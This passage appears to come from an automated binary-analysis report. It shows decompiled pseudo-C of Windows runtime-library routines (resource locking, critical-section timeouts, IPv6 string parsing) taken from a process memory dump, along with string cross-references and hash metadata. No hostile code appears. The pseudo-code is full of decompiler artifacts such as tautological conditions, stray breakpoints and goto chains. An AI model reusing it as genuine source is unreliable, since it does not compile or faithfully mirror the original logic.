                                          				signed int _t92;
                                          				void* _t104;
                                          				void* _t105;
                                          
                                          				_t64 = _a4;
                                          				_t32 =  *(_t64 + 0x28);
                                          				_t71 = _t64 + 0x28;
                                          				_push(_t92);
                                          				if(_t32 < 0) {
                                          					_t78 =  *[fs:0x18];
                                          					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                          					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                          						goto L3;
                                          					} else {
                                          						__eflags = _t32 | 0xffffffff;
                                          						asm("lock xadd [ecx], eax");
                                          						return 1;
                                          					}
                                          				} else {
                                          					L3:
                                          					_push(_t86);
                                          					while(1) {
                                          						L4:
                                          						__eflags = _t32;
                                          						if(_t32 == 0) {
                                          							break;
                                          						}
                                          						__eflags = _a8;
                                          						if(_a8 == 0) {
                                          							__eflags = 0;
                                          							return 0;
                                          						} else {
                                          							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                          							_t79 = _t64 + 0x24;
                                          							_t71 = 1;
                                          							asm("lock xadd [eax], ecx");
                                          							_t32 =  *(_t64 + 0x28);
                                          							_a4 = _t32;
                                          							__eflags = _t32;
                                          							if(_t32 != 0) {
                                          								L19:
                                          								_t86 = 0;
                                          								__eflags = 0;
                                          								while(1) {
                                          									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                          									asm("sbb esi, esi");
                                          									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x024001c0;
                                          									_push(_t92);
                                          									_push(0);
                                          									_t37 = E0231F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                          									__eflags = _t37 - 0x102;
                                          									if(_t37 != 0x102) {
                                          										break;
                                          									}
                                          									_t71 =  *(_t92 + 4);
                                          									_t85 =  *_t92;
                                          									_t51 = E02364FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                          									_push(_t85);
                                          									_push(_t51);
                                          									E02373F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                          									E02373F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                          									_t86 = _t86 + 1;
                                          									_t105 = _t104 + 0x28;
                                          									__eflags = _t86 - 2;
                                          									if(__eflags > 0) {
                                          										E023A217A(_t71, __eflags, _t64);
                                          									}
                                          									_push("RTL: Re-Waiting\n");
                                          									_push(0);
                                          									_push(0x65);
                                          									E02373F92();
                                          									_t104 = _t105 + 0xc;
                                          								}
                                          								__eflags = _t37;
                                          								if(__eflags < 0) {
                                          									_push(_t37);
                                          									E02363915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                          									asm("int3");
                                          									_t40 =  *_t71;
                                          									 *_t71 = 0;
                                          									__eflags = _t40;
                                          									if(_t40 == 0) {
                                          										L1:
                                          										_t42 = E02345384(_t92 + 0x24);
                                          										if(_t42 != 0) {
                                          											goto L31;
                                          										} else {
                                          											goto L2;
                                          										}
                                          									} else {
                                          										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                          										_push( &_a4);
                                          										_push(_t40);
                                          										_t49 = E0231F970( *((intOrPtr*)(_t92 + 0x18)));
                                          										__eflags = _t49;
                                          										if(__eflags >= 0) {
                                          											goto L1;
                                          										} else {
                                          											_push(_t49);
                                          											E02363915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                          											L31:
                                          											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                          											_push( &_a4);
                                          											_push(1);
                                          											_t42 = E0231F970( *((intOrPtr*)(_t92 + 0x20)));
                                          											__eflags = _t42;
                                          											if(__eflags >= 0) {
                                          												L2:
                                          												return _t42;
                                          											} else {
                                          												_push(_t42);
                                          												E02363915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                          												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                          												_push( &_a4);
                                          												_push(1);
                                          												_t42 = E0231F970( *((intOrPtr*)(_t92 + 0x20)));
                                          												__eflags = _t42;
                                          												if(__eflags >= 0) {
                                          													goto L2;
                                          												} else {
                                          													_push(_t42);
                                          													_t45 = E02363915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                          													asm("int3");
                                          													while(1) {
                                          														_t74 = _t45;
                                          														__eflags = _t45 - 1;
                                          														if(_t45 != 1) {
                                          															break;
                                          														}
                                          														_t86 = _t86 | 0xffffffff;
                                          														_t45 = _t74;
                                          														asm("lock cmpxchg [ebx], edi");
                                          														__eflags = _t45 - _t74;
                                          														if(_t45 != _t74) {
                                          															continue;
                                          														} else {
                                          															_t46 =  *[fs:0x18];
                                          															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                          															return _t46;
                                          														}
                                          														goto L37;
                                          													}
                                          													E02345329(_t74, _t92);
                                          													_push(1);
                                          													return E023453A5(_t92);
                                          												}
                                          											}
                                          										}
                                          									}
                                          								} else {
                                          									_t32 =  *(_t64 + 0x28);
                                          									continue;
                                          								}
                                          							} else {
                                          								_t71 =  *_t79;
                                          								__eflags = _t71;
                                          								if(__eflags > 0) {
                                          									while(1) {
                                          										_t57 = _t71;
                                          										asm("lock cmpxchg [edi], esi");
                                          										__eflags = _t57 - _t71;
                                          										if(_t57 == _t71) {
                                          											break;
                                          										}
                                          										_t71 = _t57;
                                          										__eflags = _t57;
                                          										if(_t57 > 0) {
                                          											continue;
                                          										}
                                          										break;
                                          									}
                                          									_t32 = _a4;
                                          									__eflags = _t71;
                                          								}
                                          								if(__eflags != 0) {
                                          									continue;
                                          								} else {
                                          									goto L19;
                                          								}
                                          							}
                                          						}
                                          						goto L37;
                                          					}
                                          					_t71 = _t71 | 0xffffffff;
                                          					_t32 = 0;
                                          					asm("lock cmpxchg [edx], ecx");
                                          					__eflags = 0;
                                          					if(0 != 0) {
                                          						goto L4;
                                          					} else {
                                          						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                          						return 1;
                                          					}
                                          				}
                                          				L37:
                                          			}

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023822F4
                                          Strings
                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 023822FC
                                          • RTL: Resource at %p, xrefs: 0238230B
                                          • RTL: Re-Waiting, xrefs: 02382328
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-871070163
                                          • Opcode ID: 094c5c7d61cd5d77c85b80c872953c697b42e9ea81d68e6073800c5ac0ba82cd
                                          • Instruction ID: 512a6f3cd010944609429b5a8ce9b33600621023b06b277a7cc9f10469c3cee0
                                          • Opcode Fuzzy Hash: 094c5c7d61cd5d77c85b80c872953c697b42e9ea81d68e6073800c5ac0ba82cd
                                          • Instruction Fuzzy Hash: 9351D4716017156BEB25AB28CC80FA773EDEF58724F114269FD09DF284EB61E8418FA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 51%
                                          			E0234EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				signed int _v24;
                                          				intOrPtr* _v28;
                                          				intOrPtr _v32;
                                          				signed int _v36;
                                          				intOrPtr _v40;
                                          				short _v66;
                                          				char _v72;
                                          				void* __esi;
                                          				intOrPtr _t38;
                                          				intOrPtr _t39;
                                          				signed int _t40;
                                          				intOrPtr _t42;
                                          				intOrPtr _t43;
                                          				signed int _t44;
                                          				void* _t46;
                                          				intOrPtr _t48;
                                          				signed int _t49;
                                          				intOrPtr _t50;
                                          				intOrPtr _t53;
                                          				signed char _t67;
                                          				void* _t72;
                                          				intOrPtr _t77;
                                          				intOrPtr* _t80;
                                          				intOrPtr _t84;
                                          				intOrPtr* _t85;
                                          				void* _t91;
                                          				void* _t92;
                                          				void* _t93;
                                          
                                          				_t80 = __edi;
                                          				_t75 = __edx;
                                          				_t70 = __ecx;
                                          				_t84 = _a4;
                                          				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                          					E0233DA92(__ecx, __edx, __eflags, _t84);
                                          					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                          				}
                                          				_push(0);
                                          				__eflags = _t38 - 0xffffffff;
                                          				if(_t38 == 0xffffffff) {
                                          					_t39 =  *0x240793c; // 0x0
                                          					_push(0);
                                          					_push(_t84);
                                          					_t40 = E023216C0(_t39);
                                          				} else {
                                          					_t40 = E0231F9D4(_t38);
                                          				}
                                          				_pop(_t85);
                                          				__eflags = _t40;
                                          				if(__eflags < 0) {
                                          					_push(_t40);
                                          					E02363915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                          					asm("int3");
                                          					while(1) {
                                          						L21:
                                          						_t76 =  *[fs:0x18];
                                          						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                          						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                          						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                          							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                          							_v66 = 0x1722;
                                          							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                          							_t76 =  &_v72;
                                          							_push( &_v72);
                                          							_v28 = _t85;
                                          							_v40 =  *((intOrPtr*)(_t85 + 4));
                                          							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                          							_push(0x10);
                                          							_push(0x20402);
                                          							E023201A4( *0x7ffe0382 & 0x000000ff);
                                          						}
                                          						while(1) {
                                          							_t43 = _v8;
                                          							_push(_t80);
                                          							_push(0);
                                          							__eflags = _t43 - 0xffffffff;
                                          							if(_t43 == 0xffffffff) {
                                          								_t71 =  *0x240793c; // 0x0
                                          								_push(_t85);
                                          								_t44 = E02321F28(_t71);
                                          							} else {
                                          								_t44 = E0231F8CC(_t43);
                                          							}
                                          							__eflags = _t44 - 0x102;
                                          							if(_t44 != 0x102) {
                                          								__eflags = _t44;
                                          								if(__eflags < 0) {
                                          									_push(_t44);
                                          									E02363915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                          									asm("int3");
                                          									E023A2306(_t85);
                                          									__eflags = _t67 & 0x00000002;
                                          									if((_t67 & 0x00000002) != 0) {
                                          										_t7 = _t67 + 2; // 0x4
                                          										_t72 = _t7;
                                          										asm("lock cmpxchg [edi], ecx");
                                          										__eflags = _t67 - _t67;
                                          										if(_t67 == _t67) {
                                          											E0234EC56(_t72, _t76, _t80, _t85);
                                          										}
                                          									}
                                          									return 0;
                                          								} else {
                                          									__eflags = _v24;
                                          									if(_v24 != 0) {
                                          										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                          									}
                                          									return 2;
                                          								}
                                          								goto L36;
                                          							}
                                          							_t77 =  *((intOrPtr*)(_t80 + 4));
                                          							_push(_t67);
                                          							_t46 = E02364FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                          							_push(_t77);
                                          							E02373F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                          							_t48 =  *_t85;
                                          							_t92 = _t91 + 0x18;
                                          							__eflags = _t48 - 0xffffffff;
                                          							if(_t48 == 0xffffffff) {
                                          								_t49 = 0;
                                          								__eflags = 0;
                                          							} else {
                                          								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                          							}
                                          							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                          							_push(_t49);
                                          							_t50 = _v12;
                                          							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                          							_push(_t85);
                                          							_push( *((intOrPtr*)(_t85 + 0xc)));
                                          							_push( *((intOrPtr*)(_t50 + 0x24)));
                                          							E02373F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                          							_t53 =  *_t85;
                                          							_t93 = _t92 + 0x20;
                                          							_t67 = _t67 + 1;
                                          							__eflags = _t53 - 0xffffffff;
                                          							if(_t53 != 0xffffffff) {
                                          								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                          								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                          							}
                                          							__eflags = _t67 - 2;
                                          							if(_t67 > 2) {
                                          								__eflags = _t85 - 0x24020c0;
                                          								if(_t85 != 0x24020c0) {
                                          									_t76 = _a4;
                                          									__eflags = _a4 - _a8;
                                          									if(__eflags == 0) {
                                          										E023A217A(_t71, __eflags, _t85);
                                          									}
                                          								}
                                          							}
                                          							_push("RTL: Re-Waiting\n");
                                          							_push(0);
                                          							_push(0x65);
                                          							_a8 = _a4;
                                          							E02373F92();
                                          							_t91 = _t93 + 0xc;
                                          							__eflags =  *0x7ffe0382;
                                          							if( *0x7ffe0382 != 0) {
                                          								goto L21;
                                          							}
                                          						}
                                          						goto L36;
                                          					}
                                          				} else {
                                          					return _t40;
                                          				}
                                          				L36:
                                          			}


































                                          Strings
                                          • RTL: Re-Waiting, xrefs: 023824FA
                                          • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 023824BD
                                          • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0238248D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                          • API String ID: 0-3177188983
                                          • Opcode ID: 3c28af1236c6febe3e9839c6631d7fd9121c365cb2437b4744980b2824b2ed1d
                                          • Instruction ID: 7675d3f72823586c598ef58d822af951a2382f82dd510b51478230daa2e2b524
                                          • Opcode Fuzzy Hash: 3c28af1236c6febe3e9839c6631d7fd9121c365cb2437b4744980b2824b2ed1d
                                          • Instruction Fuzzy Hash: F741D270A00304ABDB34EB68CC89FAB77E9EF44720F208655F9559B6C1D774E941CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0235FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _t105;
                                          				void* _t110;
                                          				char _t114;
                                          				short _t115;
                                          				void* _t118;
                                          				signed short* _t119;
                                          				short _t120;
                                          				char _t122;
                                          				void* _t127;
                                          				void* _t130;
                                          				signed int _t136;
                                          				intOrPtr _t143;
                                          				signed int _t158;
                                          				signed short* _t164;
                                          				signed int _t167;
                                          				void* _t170;
                                          
                                          				_t158 = 0;
                                          				_t164 = _a4;
                                          				_v20 = 0;
                                          				_v24 = 0;
                                          				_v8 = 0;
                                          				_v12 = 0;
                                          				_v16 = 0;
                                          				_v28 = 0;
                                          				_t136 = 0;
                                          				while(1) {
                                          					_t167 =  *_t164 & 0x0000ffff;
                                          					if(_t167 == _t158) {
                                          						break;
                                          					}
                                          					_t118 = _v20 - _t158;
                                          					if(_t118 == 0) {
                                          						if(_t167 == 0x3a) {
                                          							if(_v12 > _t158 || _v8 > _t158) {
                                          								break;
                                          							} else {
                                          								_t119 =  &(_t164[1]);
                                          								if( *_t119 != _t167) {
                                          									break;
                                          								}
                                          								_t143 = 2;
                                          								 *((short*)(_a12 + _t136 * 2)) = 0;
                                          								_v28 = 1;
                                          								_v8 = _t143;
                                          								_t136 = _t136 + 1;
                                          								L47:
                                          								_t164 = _t119;
                                          								_v20 = _t143;
                                          								L14:
                                          								if(_v24 == _t158) {
                                          									L19:
                                          									_t164 =  &(_t164[1]);
                                          									_t158 = 0;
                                          									continue;
                                          								}
                                          								if(_v12 == _t158) {
                                          									if(_v16 > 4) {
                                          										L29:
                                          										return 0xc000000d;
                                          									}
                                          									_t120 = E0235EE02(_v24, _t158, 0x10);
                                          									_t170 = _t170 + 0xc;
                                          									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                          									_t136 = _t136 + 1;
                                          									goto L19;
                                          								}
                                          								if(_v16 > 3) {
                                          									goto L29;
                                          								}
                                          								_t122 = E0235EE02(_v24, _t158, 0xa);
                                          								_t170 = _t170 + 0xc;
                                          								if(_t122 > 0xff) {
                                          									goto L29;
                                          								}
                                          								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                          								goto L19;
                                          							}
                                          						}
                                          						L21:
                                          						if(_v8 > 7 || _t167 >= 0x80) {
                                          							break;
                                          						} else {
                                          							if(E0235685D(_t167, 4) == 0) {
                                          								if(E0235685D(_t167, 0x80) != 0) {
                                          									if(_v12 > 0) {
                                          										break;
                                          									}
                                          									_t127 = 1;
                                          									_a7 = 1;
                                          									_v24 = _t164;
                                          									_v20 = 1;
                                          									_v16 = 1;
                                          									L36:
                                          									if(_v20 == _t127) {
                                          										goto L19;
                                          									}
                                          									_t158 = 0;
                                          									goto L14;
                                          								}
                                          								break;
                                          							}
                                          							_a7 = 0;
                                          							_v24 = _t164;
                                          							_v20 = 1;
                                          							_v16 = 1;
                                          							goto L19;
                                          						}
                                          					}
                                          					_t130 = _t118 - 1;
                                          					if(_t130 != 0) {
                                          						if(_t130 == 1) {
                                          							goto L21;
                                          						}
                                          						_t127 = 1;
                                          						goto L36;
                                          					}
                                          					if(_t167 >= 0x80) {
                                          						L7:
                                          						if(_t167 == 0x3a) {
                                          							_t158 = 0;
                                          							if(_v12 > 0 || _v8 > 6) {
                                          								break;
                                          							} else {
                                          								_t119 =  &(_t164[1]);
                                          								if( *_t119 != _t167) {
                                          									_v8 = _v8 + 1;
                                          									L13:
                                          									_v20 = _t158;
                                          									goto L14;
                                          								}
                                          								if(_v28 != 0) {
                                          									break;
                                          								}
                                          								_v28 = _v8 + 1;
                                          								_t143 = 2;
                                          								_v8 = _v8 + _t143;
                                          								goto L47;
                                          							}
                                          						}
                                          						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                          							break;
                                          						} else {
                                          							_v12 = _v12 + 1;
                                          							_t158 = 0;
                                          							goto L13;
                                          						}
                                          					}
                                          					if(E0235685D(_t167, 4) != 0) {
                                          						_v16 = _v16 + 1;
                                          						goto L19;
                                          					}
                                          					if(E0235685D(_t167, 0x80) != 0) {
                                          						_v16 = _v16 + 1;
                                          						if(_v12 > 0) {
                                          							break;
                                          						}
                                          						_a7 = 1;
                                          						goto L19;
                                          					}
                                          					goto L7;
                                          				}
                                          				 *_a8 = _t164;
                                          				if(_v12 != 0) {
                                          					if(_v12 != 3) {
                                          						goto L29;
                                          					}
                                          					_v8 = _v8 + 1;
                                          				}
                                          				if(_v28 != 0 || _v8 == 7) {
                                          					if(_v20 != 1) {
                                          						if(_v20 != 2) {
                                          							goto L29;
                                          						}
                                          						 *((short*)(_a12 + _t136 * 2)) = 0;
                                          						L65:
                                          						_t105 = _v28;
                                          						if(_t105 != 0) {
                                          							_t98 = (_t105 - _v8) * 2; // 0x11
                                          							E02338980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                          							_t110 = 8;
                                          							E0232DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                          						}
                                          						return 0;
                                          					}
                                          					if(_v12 != 0) {
                                          						if(_v16 > 3) {
                                          							goto L29;
                                          						}
                                          						_t114 = E0235EE02(_v24, 0, 0xa);
                                          						_t170 = _t170 + 0xc;
                                          						if(_t114 > 0xff) {
                                          							goto L29;
                                          						}
                                          						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                          						goto L65;
                                          					}
                                          					if(_v16 > 4) {
                                          						goto L29;
                                          					}
                                          					_t115 = E0235EE02(_v24, 0, 0x10);
                                          					_t170 = _t170 + 0xc;
                                          					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                          					goto L65;
                                          				} else {
                                          					goto L29;
                                          				}
                                          			}


























                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.663448508.0000000002310000.00000040.00000001.sdmp, Offset: 02300000, based on PE: true
                                          • Associated: 00000007.00000002.663440597.0000000002300000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663536466.00000000023F0000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663545005.0000000002400000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663553811.0000000002404000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663561380.0000000002407000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663567943.0000000002410000.00000040.00000001.sdmp
                                          • Associated: 00000007.00000002.663609294.0000000002470000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: __fassign
                                          • String ID:
                                          • API String ID: 3965848254-0
                                          • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                          • Instruction ID: a1a918c68e92306350ff36486ec2abf3bdd3b3c50b46d914ac3967f5ff45bfea
                                          • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                          • Instruction Fuzzy Hash: D791B231D00229EFDF24DF58C845BAEB7F8FF46709F20846AD809AB552E7305A45CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%